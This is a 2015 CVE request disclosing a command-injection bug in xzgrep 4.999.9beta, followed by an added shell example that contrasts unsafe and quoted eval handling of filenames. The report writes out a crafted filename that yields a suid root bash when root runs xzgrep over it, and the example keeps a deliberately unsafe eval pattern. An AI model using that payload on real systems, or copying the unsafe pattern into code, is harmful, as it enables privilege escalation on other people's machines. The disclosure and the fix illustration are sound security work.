Date: Mon, 18 May 2015 13:16:33 +0200
From: Bart Dopheide <>
Subject: CVE request: xzgrep 4.999.9beta arbitrary code execution

I discovered a bug in xzgrep 4.999.9beta. Please assign a CVE for this.

* Affected versions: 4.999.9beta
* Fixed versions: 5.0.0 and up, 5.2.0 and up
* Description:

xzgrep 4.999.9beta processes filenames containing a semicolon 
incorrectly, which allows for arbitrary code execution as the local user 
running xzgrep.

Demonstration of the vulnerability:
  sh-4.1$ touch /tmp/semi\;colon
  sh-4.1$ xzgrep anystring /tmp/semi\;colon 
  xz: /tmp/semi: No such file or directory
  /usr/bin/xzgrep: line 199: colon: command not found
xzgrep tries to extract/grep /tmp/semi and tries to execute "colon", which 
is obviously not wanted.

With a specially crafted filename and three ounces of social 
engineering, a local root exploit is possible. For example:
  sh-4.1$ touch '/var/tmp/;echo -e "cp -p \0057bin\0057bash \0057var\0057tmp\0057\nchmod u+s \0057var\0057tmp\0057bash" >zzz;sh zzz;rm -f zzz'
  sh-4.1# find /var/tmp -type f -exec xzgrep anystring {} \+
A suid root /var/tmp/bash should be the result.

I checked RHEL 6, CentOS 6: they run 4.999.9beta and they are vulnerable.

Bart Dopheide

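The quoting defect behind this report, as an added example that is not from the original post or from the xz project: a POSIX sh helper that quotes a filename before it is spliced into a command string handed to eval, shown beside the unquoted pattern of 4.999.9beta. `shell_quote`, `unsafe_grep`, `safe_grep`, `roundtrip` and the scratch file are constructed here for illustration.

```shell
#!/bin/sh
# Added example (not code from the post or from xz): how a filename must be
# quoted before it is interpolated into a command string passed to eval.
# shell_quote, unsafe_grep, safe_grep and the scratch file are constructed.

# shell_quote: wrap the argument in single quotes, turning each embedded
# single quote into '\'' so eval sees exactly one word, whatever it contains.
shell_quote() {
    _in=$1
    _out=
    while [ -n "$_in" ]; do
        _c=${_in%"${_in#?}"}   # first character of $_in
        _in=${_in#?}           # drop it
        if [ "$_c" = "'" ]; then
            _out="$_out'\\''"
        else
            _out="$_out$_c"
        fi
    done
    printf "'%s'" "$_out"
}

# unsafe_grep: the 4.999.9beta pattern. The name is spliced unquoted into the
# command string, so a ';' in it ends the cat command and starts another one.
unsafe_grep() {
    eval "cat $2 | grep -c -- $(shell_quote "$1")"
}

# safe_grep: the same pipeline with the filename quoted for the shell first.
safe_grep() {
    eval "cat $(shell_quote "$2") | grep -c -- $(shell_quote "$1")"
}

# roundtrip: quote a string, let the shell re-parse it, and hand it back.
# Equal to the input for every string if shell_quote is correct.
roundtrip() {
    eval "printf '%s' $(shell_quote "$1")"
}

# Constructed scratch file whose name contains a semicolon, like the post's.
demo_dir=$(mktemp -d)
demo_file="$demo_dir/semi;colon"
printf 'needle\n' > "$demo_file"

echo "quoted: $(shell_quote "$demo_file")"
echo "unsafe: $(unsafe_grep needle "$demo_file" 2>/dev/null) match(es)"  # wrong file
echo "safe:   $(safe_grep needle "$demo_file") match(es)"                # right file
```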